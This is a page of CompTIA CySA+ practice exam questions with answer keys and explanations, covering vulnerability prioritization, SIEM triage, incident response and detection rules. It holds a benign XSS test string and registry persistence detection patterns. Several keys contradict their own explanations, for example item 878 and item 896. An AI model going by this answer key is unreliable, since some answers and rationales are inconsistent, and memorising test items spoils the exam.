Correlating vulnerabilities with active exploit campaigns and threat intelligence feeds is effective because it prioritizes vulnerabilities that are currently being exploited in the wild, which directly reduces the risk of a breach. This approach aligns remediation with real-world attacker behavior rather than theoretical severity.

Exam trap

CompTIA often tests the misconception that CVSS base scores alone are sufficient for prioritization, when in fact they must be combined with asset criticality, threat context, and compensating controls to reflect true organizational risk.

862
MCQhard

A security analyst is investigating a containerized environment. A scan using Trivy has identified a critical vulnerability in a container image. The container is running in a Kubernetes cluster with a Pod Security Policy that disallows privileged containers. Which additional concern should the analyst address?

A.The vulnerability is not exploitable due to the Pod Security Policy
B.The vulnerability is automatically mitigated because the container is not privileged
C.The analyst should ignore the vulnerability because the container is not privileged
D.The analyst should immediately patch the image, but also verify that the Pod Security Policy prevents privilege escalation
AnswerD

Patching is required, and the Pod Security Policy reduces impact.

Why this answer

Even if the container image has a vulnerability, the Pod Security Policy reduces risk by preventing privilege escalation. The analyst should ensure that the exploit cannot gain additional privileges due to the policy.

863
Multi-Selecthard

A vulnerability management analyst is prioritizing vulnerabilities for remediation. The analyst has the following information for three vulnerabilities: CVE-2023-1: CVSS 9.8, EPSS 0.9, asset criticality high; CVE-2023-2: CVSS 7.5, EPSS 0.01, asset criticality low; CVE-2023-3: CVSS 5.0, EPSS 0.8, asset criticality medium. According to best practices, which THREE factors should the analyst consider when prioritizing? (Select THREE)

Select 3 answers
A.CVSS score
B.CVE publication date
C.Asset criticality
D.EPSS score
E.Number of vendors affected
AnswersA, C, D

Severity is a key factor.

Why this answer

Prioritization should consider severity (CVSS), likelihood of exploitation (EPSS), and asset criticality. KEV is not mentioned in the data. Patch complexity and vendor reputation are secondary considerations but not primary factors in this context.

864
MCQmedium

A legacy system cannot be patched because the vendor no longer supports the application. What should the vulnerability manager request? For control selection, Which control best addresses the stated weakness without hiding risk?

A.Mark the vulnerability as fixed
B.Documented risk acceptance with compensating controls and a migration/remediation plan
C.Remove the system from future reports
D.Give all users local admin rights
AnswerB

Unsupported systems need formal exception handling, mitigation, ownership, and an exit path.

Why this answer

When a legacy system cannot be patched due to vendor end-of-life, the vulnerability manager must formally document the risk acceptance, implement compensating controls (e.g., network segmentation, host-based firewall rules, or application whitelisting), and create a migration or remediation plan to eventually retire or replace the system. This approach transparently acknowledges the residual risk rather than hiding it, aligning with the principle of risk treatment as defined in NIST SP 800-53 and ISO 27005.

Exam trap

The CS0-003 exam often tests the misconception that removing a system from reports or marking it as fixed is an acceptable shortcut, when in fact the correct process requires formal risk acceptance with compensating controls and a documented plan.

How to eliminate wrong answers

Option A is wrong because marking a vulnerability as 'fixed' when no patch has been applied is a false status that misrepresents the actual risk posture and violates vulnerability management policy. Option C is wrong because removing the system from future reports hides the risk from stakeholders and bypasses the necessary risk acceptance process, which is a security governance failure. Option D is wrong because granting all users local admin rights would increase the attack surface and privilege escalation risk, directly contradicting the principle of least privilege and making the system even more vulnerable.

865
Multi-Selecthard

A SOC team is tuning a SIEM to reduce false positives. Which THREE of the following metrics should the team consider when evaluating detection effectiveness? (Choose THREE)

Select 3 answers
A.False Positive Rate
B.Number of detected events
C.Precision
D.Mean Time to Detect (MTTD)
E.True Positive Rate (Recall)
AnswersA, C, E

Measures the proportion of negatives incorrectly flagged as positive.

Why this answer

A is correct because False Positive Rate (FPR) measures the proportion of benign events incorrectly flagged as malicious, directly indicating how much noise the SIEM generates. Reducing FPR is a primary goal when tuning detection rules to minimize analyst fatigue and improve alert fidelity.

Exam trap

CompTIA often tests the distinction between metrics that measure detection accuracy (FPR, Precision, Recall) versus metrics that measure operational efficiency (MTTD, event volume), leading candidates to mistakenly include MTTD or raw event counts as effectiveness metrics.

866
MCQmedium

A UEBA rule flags a user authenticating from London and Singapore within 12 minutes, followed by a mailbox forwarding rule creation. What should the analyst investigate first? In the alert triage phase, Which action gives the analyst the clearest next triage step?

A.Only the user's browser cache
B.The organisation's public DNS zone file
C.Sign-in logs, MFA result, device details, and mailbox audit events
D.Only DHCP logs from the London office
AnswerC

Impossible travel plus forwarding rule creation is a strong account-compromise pattern; identity and mailbox audit data confirm whether the activity is malicious.

Why this answer

Option C is correct because the alert indicates a potential account compromise (impossible travel from London to Singapore in 12 minutes) followed by a suspicious mailbox rule creation. The clearest next triage step is to examine sign-in logs for authentication source IPs and timestamps, MFA result to verify if the second factor was passed, device details to check for known or managed devices, and mailbox audit events to confirm who created the forwarding rule and when. This combination directly validates whether the user's credentials were used from two geographically impossible locations and whether the mailbox rule was created by the legitimate user or an attacker.

Exam trap

The CS0-003 exam often tests the concept that during alert triage, the analyst must correlate multiple log sources (authentication, MFA, device, and mailbox audit) rather than focusing on a single, irrelevant log type like DHCP or DNS, which do not provide the necessary evidence for impossible travel and mailbox rule investigations.

How to eliminate wrong answers

Option A is wrong because browser cache only stores local web data (cookies, history) and cannot provide evidence of authentication source IPs, MFA status, or mailbox rule creation events; it is irrelevant for investigating impossible travel and mailbox forwarding. Option B is wrong because the organization's public DNS zone file contains DNS records (A, MX, CNAME) for external resolution and has no relation to user authentication logs, MFA results, or mailbox audit events; it cannot help triage the alert. Option D is wrong because DHCP logs from the London office only record IP address assignments within that subnet and do not include authentication details, MFA results, or mailbox audit events; they cannot confirm the user's identity or the mailbox rule creation.

867
Multi-Selectmedium

Which pipeline controls help prevent vulnerable dependencies reaching production? (Choose two.)

Select 2 answers
A.SBOM generation and review for released builds
B.Manual badge checks at the office door
C.Software composition analysis with policy gates
D.DNS MX record rotation
AnswersA, C

SBOMs support dependency tracking and downstream risk review.

Why this answer

A is correct because SBOM (Software Bill of Materials) generation and review provides a detailed inventory of all components in a build, enabling teams to identify and block vulnerable dependencies before release. This aligns with supply chain security best practices, as SBOMs allow automated comparison against vulnerability databases (e.g., NVD) to enforce policy gates early in the pipeline.

Exam trap

The CS0-003 exam often tests the distinction between pipeline-level controls (automated, code-focused) and physical or administrative controls, so candidates may mistakenly select a non-technical option like badge checks because they confuse 'pipeline' with general security procedures.

868
MCQeasy

The CISO asks whether incident response is improving quarter over quarter. Which metric is most relevant? If the primary audience is SOC manager, which content choice is most appropriate?

A.Mean time to detect, mean time to respond, containment time, and recurrence rate
B.Number of desktop wallpapers changed
C.Number of unused dashboards
D.Total coffee consumed by analysts
AnswerA

These KPIs show detection and response effectiveness over time. The report should be tuned to SOC manager while preserving factual accuracy.

Why this answer

Mean time to detect (MTTD), mean time to respond (MTTR), containment time, and recurrence rate are the core operational metrics that directly measure the effectiveness and efficiency of an incident response program. For a SOC manager assessing quarter-over-quarter improvement, these metrics provide actionable insight into detection speed, response agility, containment effectiveness, and whether incidents are being fully remediated to prevent repeats.

Exam trap

The CS0-003 exam often tests the distinction between operational incident response metrics and irrelevant administrative or cosmetic metrics, trapping candidates who confuse 'activity tracking' with 'performance measurement'.

How to eliminate wrong answers

Option B is wrong because the number of desktop wallpapers changed is an endpoint configuration or user-experience metric, not an incident response performance indicator; it has no bearing on detection, response, or containment. Option C is wrong because the number of unused dashboards is a reporting tool hygiene metric, irrelevant to measuring incident response maturity or improvement over time.

869
MCQeasy

A vulnerability scan report shows a critical finding with a CVSS score of 9.8. The system is a web server behind a WAF that blocks the attack vector. What should the analyst do?

A.Report the finding as a false positive
B.Re-run the scan with credentials
C.Patch the server immediately
D.Document the WAF as a compensating control and accept the risk
AnswerD

Correct. Compensating controls reduce risk.

Why this answer

A compensating control (WAF) may mitigate the risk. The analyst should document it and adjust the risk rating accordingly.

870
Multi-Selecthard

A security analyst is reviewing an alert from Azure Sentinel that indicates a possible privilege escalation attempt. The alert is based on a correlation rule that detects unusual usage of the 'Add-AzKeyVaultKey' cmdlet by a user who has never used it before. The analyst needs to validate the alert and determine if the activity is malicious. Which THREE actions should the analyst take?

Select 3 answers
A.Check the user's role assignments and permissions
B.Run a vulnerability scan on the user's workstation
C.Review the Key Vault's diagnostic logs for any key retrieval after the cmdlet
D.Disable the user account immediately
E.Verify the user's identity by checking Azure AD sign-in logs
AnswersA, C, E

Understanding the user's privileges helps assess if the action is within scope.

Why this answer

Checking Azure AD logs for the authentication context, reviewing the user's recent activity history, and examining the Key Vault audit logs for any subsequent access are all relevant steps.

871
MCQmedium

A threat hunter is creating a hypothesis based on the MITRE ATT&CK framework. The hunter wants to detect adversaries using PowerShell to download files from remote servers. Which ATT&CK technique should the hunter focus on?

A.T1078 (Valid Accounts)
B.T1053.005 (Scheduled Task)
C.T1047 (WMI)
D.T1059.001 (PowerShell)
AnswerD

PowerShell is the technique for executing commands and downloading files.

Why this answer

T1059.001 is PowerShell, which is commonly used for file downloads. The hunter should create detection rules for PowerShell download cradles.

872
MCQmedium

An organization uses MISP (Malware Information Sharing Platform) to share threat intelligence with trusted partners. Which of the following standards is commonly used by MISP to structure and exchange threat intelligence data?

A.NetFlow
B.SNMP
C.STIX/TAXII
D.Syslog
AnswerC

STIX and TAXII are open standards for threat intelligence sharing, widely used in MISP.

Why this answer

STIX (Structured Threat Information Expression) and TAXII (Trusted Automated Exchange of Indicator Information) are standards for exchanging cyber threat intelligence. MISP supports STIX and TAXII for sharing.

873
MCQeasy

After a high-priority SOC escalation, file shares show rapid encryption and ransom-note creation from one workstation. What is the best immediate containment action? During containment, which decision is most defensible? which response best matches incident-response practice?

A.Run vulnerability scans on every subnet first
B.Restore backups before isolating the host
C.Email all users the ransom note
D.Isolate the workstation and disable its active sessions to file servers
AnswerD

Containment should stop encryption spread while preserving evidence for analysis. In containment, responders need action that reduces risk while preserving the investigation record.

Why this answer

Option D is correct because the immediate priority in a ransomware incident is to contain the threat by isolating the infected workstation from the network to prevent further encryption of file shares. Disabling active sessions to file servers (e.g., using SMB session termination or firewall rules) stops the lateral movement and encryption of shared data. This aligns with the NIST SP 800-61 containment strategy, which prioritizes stopping the spread before any other action.

Exam trap

The CS0-003 exam often tests the misconception that you should run scans or restore backups first, but the trap here is that immediate containment (isolation) is always the priority to stop the spread, not investigation or recovery.

How to eliminate wrong answers

Option A is wrong because running vulnerability scans on every subnet first wastes critical time during an active ransomware outbreak; scanning does not stop ongoing encryption and is a post-containment step. Option B is wrong because restoring backups before isolating the host would allow the ransomware to continue encrypting newly restored files, and backups should only be used after containment to ensure a clean restore point. Option C is wrong because emailing all users the ransom note is not a containment action; it may cause panic, spread misinformation, and does not stop the encryption process.

874
MCQhard

A development team wants to find vulnerable open-source libraries before deployment. Which control best fits this stage? For validation, Which action should be taken before closing or downgrading the finding?

A.Wireless spectrum analysis
B.Database transaction log backups
C.Software composition analysis in the CI/CD pipeline
D.Physical badge access reviews
AnswerC

SCA identifies vulnerable third-party dependencies and can gate builds before release.

Why this answer

Software composition analysis (SCA) is the correct control because it specifically scans open-source libraries and their dependencies for known vulnerabilities (CVEs) and license compliance issues. Integrating SCA into the CI/CD pipeline ensures that vulnerable libraries are identified automatically before the code is deployed, aligning with the shift-left security principle.

Exam trap

The CS0-003 exam often tests the distinction between vulnerability identification (SCA) and operational controls (backups, spectrum analysis), leading candidates to confuse general security practices with the specific need for open-source library scanning.

How to eliminate wrong answers

Option A is wrong because wireless spectrum analysis is used to detect rogue access points, interference, or unauthorized wireless devices, not to analyze software libraries. Option B is wrong because database transaction log backups are a data recovery and integrity measure, not a method for identifying vulnerabilities in open-source code.

875
MCQhard

A security analyst is reviewing DNS logs and notices that a workstation is making frequent queries to domains with random-looking strings, such as 'a3b9f2d1.example.com'. These domains resolve to different IP addresses each time. Which type of activity is most likely being observed?

A.Normal DNS caching behavior
B.A misconfigured DNS resolver
C.DNS tunneling
D.Domain generation algorithm (DGA) usage
AnswerD

Random-looking domains that change frequently are characteristic of DGA.

Why this answer

Domain Generation Algorithms (DGAs) produce random-looking domain names that change frequently to evade blocklists. This behavior is typical of malware that uses DGA for command and control.

876
MCQhard

A threat hunter is creating a Sigma rule to detect a specific TTP where an attacker uses reg.exe to create a Run key for persistence. Which of the following Sigma rule event selectors would best detect this activity?

A.EventID: 4688 (Process Creation) AND ParentImage: '*reg.exe*'
B.EventID: 13 (Registry Value Set) AND TargetObject: '*\CurrentVersion\Run*'
C.EventID: 4657 (Registry modification) AND ObjectName: '*\RunOnce*'
D.EventID: 1 (Process Creation) AND CommandLine: '*reg.exe*'
AnswerB

Directly detects registry value writes to the Run key.

Why this answer

Registry persistence via Run keys is commonly achieved by modifying HKCU\Software\Microsoft\Windows\CurrentVersion\Run. Sigma rules targeting registry add/modify events with that path will detect it.

877
Multi-Selecthard

A web application DAST scan reports stored XSS. Which evidence helps confirm exploitability? (Choose two.)

Select 2 answers
A.Payload persists and executes when another user views the affected page
B.The vulnerable parameter and output encoding context are identified
C.The server has a large disk
D.The application uses HTTPS
AnswersA, B

Stored execution against another user validates impact.

Why this answer

Option A is correct because stored XSS is confirmed exploitable only when the injected payload (e.g., <script>alert(1)</script>) is persistently stored on the server (e.g., in a database or file) and then rendered and executed in the browser of another user who views the affected page. This demonstrates that the attack can impact victims beyond the tester, proving the vulnerability is not self-inflicted or limited to the attacker's session.

Exam trap

The CS0-003 exam often tests the distinction between identifying a vulnerability's context (Option B) and actually proving it is exploitable (Option A), leading candidates to confuse analysis steps with exploitation evidence.

878
MCQhard

A company's incident response team is handling a ransomware incident that has encrypted all files on the file server and spread to several workstations. The team has isolated the affected systems and obtained memory dumps and disk images. The CEO demands immediate restoration of operations and suggests paying the ransom to decrypt files quickly. The company has recent backups but they are stored on a network share that was also encrypted. The CISO wants to ensure that the root cause is identified before restoration. As the lead incident responder, which of the following actions should you take NEXT?

A.Pay the ransom and then restore from the decrypted files
B.Restore the backups to a clean environment and then reimage the affected systems
C.Immediately reimage all affected systems and restore from the most recent clean backups
D.Analyze the memory dumps to identify the infection vector and check for persistence mechanisms
AnswerD

Root cause analysis ensures that the vulnerability is fixed before restoration.

Why this answer

Option C is correct because analyzing the memory dumps will help identify the initial infection vector (e.g., phishing email, exploited vulnerability) and any persistence mechanisms. This information is critical to prevent reinfection after restoration. Options A and D skip root cause analysis, risking reinfection.

Option B is ill-advised and may not work.

879
MCQmedium

A security analyst is reviewing a vulnerability scan report from Rapid7 InsightVM. The report shows that a Tomcat server has a plugin finding indicating that the 'Server' header is set to 'Apache-Coyote/1.1', which reveals the server version. Which type of vulnerability does this represent?

A.Broken access control
B.Injection vulnerability
C.Security misconfiguration
D.Cryptographic failure
AnswerC

Revealing server version is a misconfiguration that leaks information.

Why this answer

Revealing server version information is a form of information disclosure, which is a security misconfiguration. It is not an injection, broken access control, or cryptographic failure.

880
MCQeasy

A security analyst needs to verify that a critical patch was successfully applied to all endpoints in the organization after an emergency patch deployment. Which phase of the vulnerability lifecycle is the analyst performing?

A.Remediation
B.Prioritization
C.Discovery
D.Verification
AnswerD

Verification confirms the patch was applied successfully.

Why this answer

Verification ensures that remediation (patch application) was effective. It occurs after the fix is applied.

881
MCQmedium

An analyst receives an alert that a user's workstation contacted a known command-and-control (C2) IP address. The analyst checks the EDR logs and finds that the process 'svchost.exe' initiated the connection. What should the analyst do next to determine if this is a true positive?

A.Check the parent process of svchost.exe
B.Verify the IP address with threat intelligence feeds
C.Search for other workstations contacting the same IP
D.Isolate the workstation from the network immediately
AnswerA

Svchost.exe normally runs from Services.exe; abnormal parent indicates potential code injection or LOLBins.

Why this answer

Checking the parent process of svchost.exe helps identify if it was spawned by a malicious process like a service or scheduled task, indicating compromise.

882
MCQeasy

A security analyst is reviewing a vulnerability scan report and sees a critical finding with a CVSS v3.1 base score of 9.8. The vector string is AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H. Which of the following best describes the attack vector component (AV:N)?

A.The attacker can exploit the vulnerability over a network from a remote system
B.The attacker must be on the same physical network segment
C.The attacker requires local access to the target system
D.The attacker must be physically present at the device
AnswerA

AV:N indicates network-based remote exploitation.

Why this answer

AV:N means the vulnerability can be exploited over a network, such as the internet, without requiring physical or local access.

883
Multi-Selectmedium

A security analyst is investigating a reported vulnerability in a web application. The team uses Burp Suite for DAST scanning. Which TWO of the following findings would be classified as injection vulnerabilities according to OWASP Top 10?

Select 2 answers
A.Use of a component with known vulnerabilities
B.Broken access control allowing privilege escalation
C.Stored XSS in the comment section
D.Security misconfiguration exposing directory listing
E.SQL injection in the login form
AnswersC, E

XSS is an injection vulnerability (injection of scripts).

Why this answer

SQL injection and Stored XSS are both injection flaws. SQL injection is classic injection, and XSS is also a form of injection.

884
MCQeasy

A security analyst is reviewing a SIEM alert that triggered on a single failed login attempt from a known internal IP address to a file server. The user authenticated successfully on the next attempt. Which classification best describes this alert?

A.True negative
B.True positive
C.False negative
D.False positive
AnswerD

Correct. The alert fired on benign activity, so it is a false positive.

Why this answer

The alert is a false positive because a single failed login followed by success is normal user behavior and not indicative of malicious activity.

885
MCQeasy

A security analyst is reviewing a SIEM alert that triggered on a known malicious IP address communicating with an internal server. The analyst checks the threat intelligence feed and confirms the IP is associated with a command-and-control server. What type of alert is this?

A.False negative
B.True positive
C.False positive
D.True negative
AnswerB

The alert correctly identified known malicious activity.

Why this answer

A true positive occurs when an alert correctly identifies malicious activity. The IP is confirmed as a C2 server, so the alert is valid.

886
Multi-Selectmedium

A security analyst is reviewing alerts from multiple security tools. Which three of the following are key indicators of a potential credential-based attack in the environment? (Choose three.)

Select 3 answers
.Multiple failed logon attempts followed by a single successful logon from the same source IP address.
.A single user account logging in from two geographically distant locations within a short time window.
.An account that has been inactive for 90 days suddenly authenticating to a critical server.
.A spike in outbound DNS traffic from a workstation during business hours.
.An increase in the number of TCP SYN packets sent to a single external IP address.
.A system event log showing a successful logon after a scheduled patch reboot.

Why this answer

Multiple failed logon attempts followed by a single successful logon from the same source IP address is a classic indicator of a password spraying or brute-force attack. The attacker tries many usernames or passwords, and when one succeeds, the pattern shifts from failures to a success. This sequence is a key sign of credential compromise.

Exam trap

CompTIA often tests the distinction between credential-based attacks (e.g., brute-force, password spraying) and other attack types like reconnaissance (SYN scan) or data exfiltration (DNS tunneling), so candidates must focus on the authentication sequence rather than traffic volume or protocol anomalies.

887
MCQmedium

A SOC analyst is triaging a SIEM alert for a registry modification on a workstation. The alert indicates a new Run key was added under HKCU\Software\Microsoft\Windows\CurrentVersion\Run. Which of the following is the most likely purpose of this modification?

A.To change the desktop wallpaper
B.To establish persistence
C.To disable Windows Defender
D.To update the system time
AnswerB

Run keys cause the specified program to run at every user logon, providing persistence.

Why this answer

Run keys are a common persistence mechanism used by malware to ensure execution at user logon.

888
MCQhard

During a vulnerability scan, the scanner reports a high number of open ports on a server that is supposed to be a hardened web server. The analyst investigates and finds that the server is running unnecessary services. Which of the following is the MOST effective long-term solution?

A.Implement a configuration management baseline and enforce it
B.Disable the unnecessary services manually
C.Increase the frequency of vulnerability scans
D.Install a host-based firewall to block the ports
AnswerA

Configuration management ensures consistent hardening and drift detection.

Why this answer

Implementing a configuration management baseline and enforcing it (Option A) is the most effective long-term solution because it ensures that the server is consistently provisioned with only the necessary services and configurations. This approach uses tools like Ansible, Puppet, or Chef to automatically remediate drift, preventing unnecessary services from reappearing after manual changes or reboots. It addresses the root cause by codifying the desired state, rather than relying on ad-hoc fixes.

Exam trap

CompTIA often tests the distinction between detection (scanning) and remediation (configuration management), and the trap here is that candidates choose a reactive control like a firewall or manual disabling instead of the proactive, automated enforcement that prevents the issue from recurring.

How to eliminate wrong answers

Option B is wrong because manually disabling unnecessary services is a temporary, non-scalable fix that does not prevent the services from being re-enabled during updates or reboots, and it lacks auditability and enforcement. Option C is wrong because increasing the frequency of vulnerability scans only detects the problem more often; it does not remediate the root cause of unnecessary services running. Option D is wrong because installing a host-based firewall to block ports only masks the vulnerability by hiding the open ports from scans, but the unnecessary services remain running and could still be exploited via local access or other attack vectors.

889
Multi-Selecthard

A threat intelligence analyst has produced a report containing specific Indicators of Compromise (IoCs) such as IP addresses, domain names, and file hashes. Which TWO audiences are most appropriate for this type of intelligence? (Select TWO.)

Select 2 answers
A.Board of directors
B.SOC analysts
C.Executive leadership
D.Incident responders
E.Network engineers
AnswersB, D

SOC uses IoCs for detection and alerting.

Why this answer

Tactical intelligence (IoCs) is most useful for the SOC team and incident responders who can use them for detection and response. Executives need strategic intelligence, and network engineers need operational intelligence.

890
MCQhard

A security analyst is reviewing the results of a container image scan using Trivy. The scan reports a critical vulnerability in a base image layer. The development team states that the vulnerability is not exploitable because the affected library is not used in the application. According to vulnerability management best practices, what should the analyst do?

A.Accept the risk and close the finding.
B.Request that the development team remove the unused library and rebuild the image.
C.Ignore the finding since it is not exploitable.
D.Apply a compensating control at the network level to block exploitation.
AnswerB

Removing the unused library and rebuilding eliminates the vulnerability.

Why this answer

Even if the library is not used, it is best practice to rebuild the image with a patched base image to eliminate the vulnerability and ensure compliance.

891
MCQhard

During a vulnerability assessment of a Kubernetes cluster, a security analyst finds that a container is running with privileged mode enabled and has a hostPath mount that grants write access to the host's /var/log directory. Which of the following is the most significant security risk associated with this configuration?

A.Data leakage through unrestricted storage access
B.Excessive network permissions allowing lateral movement
C.Potential for container escape and host node compromise
D.Increased attack surface due to unnecessary services running in the container
AnswerC

Privileged mode and hostPath mounts can facilitate escape.

Why this answer

Privileged containers combined with hostPath mounts can allow container escape, enabling an attacker to gain root access on the host node.

892
MCQhard

A development team wants to find vulnerable open-source libraries before deployment. Which control best fits this stage? For business prioritization, Which recommendation gives the best risk-based order of work?

A.Database transaction log backups
B.Physical badge access reviews
C.Wireless spectrum analysis
D.Software composition analysis in the CI/CD pipeline
AnswerD

SCA identifies vulnerable third-party dependencies and can gate builds before release.

Why this answer

Software Composition Analysis (SCA) is the correct control because it specifically scans open-source libraries for known vulnerabilities (CVEs) and license compliance issues. Integrating SCA into the CI/CD pipeline ensures vulnerabilities are detected and blocked before the code is deployed, aligning with the 'shift left' security principle. This directly addresses the team's goal of finding vulnerable open-source libraries pre-deployment.

Exam trap

CompTIA often tests the concept that 'shift left' security controls like SCA are distinct from operational or physical security controls, and the trap here is confusing vulnerability scanning of code with unrelated security processes like backups or physical access reviews.

How to eliminate wrong answers

Option A is wrong because database transaction log backups are a data recovery and integrity control, not a method for scanning open-source libraries for vulnerabilities. Option B is wrong because physical badge access reviews control physical access to facilities, not the security of software dependencies in a development pipeline. Option C is wrong because wireless spectrum analysis detects RF interference and rogue access points, not vulnerabilities in open-source code libraries.

893
MCQmedium

During a security incident, the incident response team has identified that a phishing email led to credential theft and lateral movement. Which component of the incident report should detail the sequence of events from initial compromise to containment?

A.Root cause analysis
B.Impact assessment
C.Lessons learned
D.Timeline
AnswerD

The timeline records the sequence of events.

Why this answer

The timeline component of an incident report provides a chronological sequence of events, which is essential for understanding how the incident unfolded.

894
MCQhard

An incident was contained successfully, but delayed escalation allowed the attacker more dwell time. What should the post-incident review produce? During eradication, which decision is most defensible?

A.A generic statement that security is important
B.Deletion of all incident tickets
C.A blame list of individual analysts
D.Specific playbook updates, escalation triggers, owners, and due dates
AnswerD

Lessons learned should translate findings into trackable process improvements. In eradication, responders need action that reduces risk while preserving the investigation record.

Why this answer

Option D is correct because a post-incident review must produce actionable improvements to prevent recurrence. Delayed escalation indicates a failure in detection or notification procedures; therefore, specific playbook updates, escalation triggers, owners, and due dates directly address the root cause by refining incident response workflows and ensuring timely escalation in future incidents.

Exam trap

CompTIA often tests the misconception that post-incident reviews are about assigning blame or cleaning up records, when the correct focus is on process improvement through specific, measurable updates to the incident response plan.

How to eliminate wrong answers

Option A is wrong because a generic statement that security is important provides no concrete, measurable changes to processes or procedures, failing to correct the specific escalation delay. Option B is wrong because deletion of all incident tickets destroys forensic evidence and audit trails required for compliance, legal proceedings, and future analysis under frameworks like NIST SP 800-61. Option C is wrong because a blame list of individual analysts fosters a punitive culture, discourages reporting, and ignores systemic process failures that allowed the escalation delay, contrary to the post-incident review's goal of continuous improvement.

895
MCQeasy

A security analyst needs to share threat intelligence with other organizations in a standardized format. Which of the following standards should the analyst use?

A.REST
B.STIX/TAXII
C.SOAP
D.SNMP
AnswerB

STIX/TAXII are the standard for threat intelligence sharing.

Why this answer

STIX (Structured Threat Information Expression) is a standardized language for describing threat intelligence, and TAXII (Trusted Automated eXchange of Indicator Information) is a transport mechanism. Together, they enable sharing.

896
Multi-Selectmedium

A security analyst is configuring a compliance scanner to check Linux servers against the CIS Benchmark. The analyst wants to ensure that only foundational security configurations are enforced to avoid breaking production applications. Which TWO CIS Benchmark levels would be most appropriate for this environment? (Select TWO)

Select 2 answers
A.CIS Level 3 Benchmark
B.CIS Level 1 Benchmark
C.CIS Level 2 Benchmark
D.CIS Level 0 Benchmark
AnswersB, C

Level 1 is the basic security configuration.

Why this answer

CIS Benchmarks define two levels: Level 1 (basic) and Level 2 (comprehensive).

897
MCQhard

During a forensic investigation, an analyst needs to acquire memory from a Linux server. Which tool is specifically designed for this purpose?

A.dd
B.LiME
C.FTK Imager
D.WinPmem
AnswerB

Correct. LiME is a Linux memory acquisition tool.

Why this answer

LiME (Linux Memory Extractor) is a loadable kernel module for acquiring volatile memory from Linux systems.

898
MCQhard

During a post-incident activity, the CSIRT performs a root cause analysis for a data breach. They discover that the breach originated from a misconfigured S3 bucket that allowed public read access. Which of the following actions should be included in the lessons learned to prevent recurrence?

A.Rotate all access keys for the affected account
B.Disable public access to all S3 buckets permanently
C.Conduct a penetration test on the cloud environment
D.Implement automated compliance checks for cloud storage configurations
AnswerD

Automated checks prevent misconfigurations from going unnoticed.

Why this answer

Implementing automated compliance checks using tools like AWS Config ensures that storage configurations are continuously monitored and misconfigurations are flagged or corrected.

899
MCQmedium

A security analyst is reviewing a vulnerability scan report and finds a critical vulnerability with a CVSS v3.1 base score of 9.8. The vector string is: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H. Which of the following best describes the attack vector and impact of this vulnerability?

A.Adjacent attack vector, high impact on availability only
B.Network attack vector, high impact on confidentiality, integrity, and availability
C.Physical attack vector, medium impact on confidentiality
D.Local attack vector, low impact on confidentiality
AnswerB

Correct as per the CVSS vector.

Why this answer

AV:N indicates network-based attack vector, meaning the vulnerability can be exploited remotely over the network. The CIA impact ratings are all High, indicating complete compromise of confidentiality, integrity, and availability.

900
MCQhard

A threat hunter wants a portable detection for suspicious rundll32 execution that can be converted for multiple SIEM platforms. Which artefact format best fits this goal? In the alert triage phase, Which action gives the analyst the clearest next triage step?

A.CVSS vector string
B.Sigma rule
C.YARA rule
D.OpenIOC package only
AnswerB

Sigma is designed as a generic detection-rule format that can be translated into SIEM-specific queries.

Why this answer

Sigma rules are the correct choice because they are designed as a generic, open-source signature format for log events, making them portable across multiple SIEM platforms (e.g., Splunk, Elastic, QRadar) without vendor lock-in. For suspicious rundll32 execution, a Sigma rule can describe the specific event log patterns (e.g., Event ID 4688 with CommandLine containing 'rundll32.exe') that can be converted into each SIEM's native query language. This portability directly meets the threat hunter's goal of creating a detection that can be reused across different environments.

Exam trap

The CS0-003 exam often tests the distinction between detection artefacts (Sigma, YARA) and vulnerability scoring (CVSS), and the trap here is that candidates may confuse YARA's file-scanning capability with log-based SIEM detection, forgetting that YARA rules cannot be directly converted to SIEM queries without significant rework.

How to eliminate wrong answers

Option A is wrong because a CVSS vector string is a standardized score for vulnerability severity (e.g., CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H), not a detection artefact for identifying suspicious process execution like rundll32; it describes risk, not a pattern to match in logs. Option C is wrong because YARA rules are primarily designed for file-based pattern matching (e.g., identifying malware binaries by byte sequences or strings), not for parsing Windows Event Logs or SIEM log streams; while YARA can be used for memory analysis, it is not natively portable to SIEM platforms for log-based detection.

Page 11

Page 12 of 14

Page 13
CompTIA CySA+ CS0-003 CS0-003 Questions 826–900 | Page 12/14 | Courseiva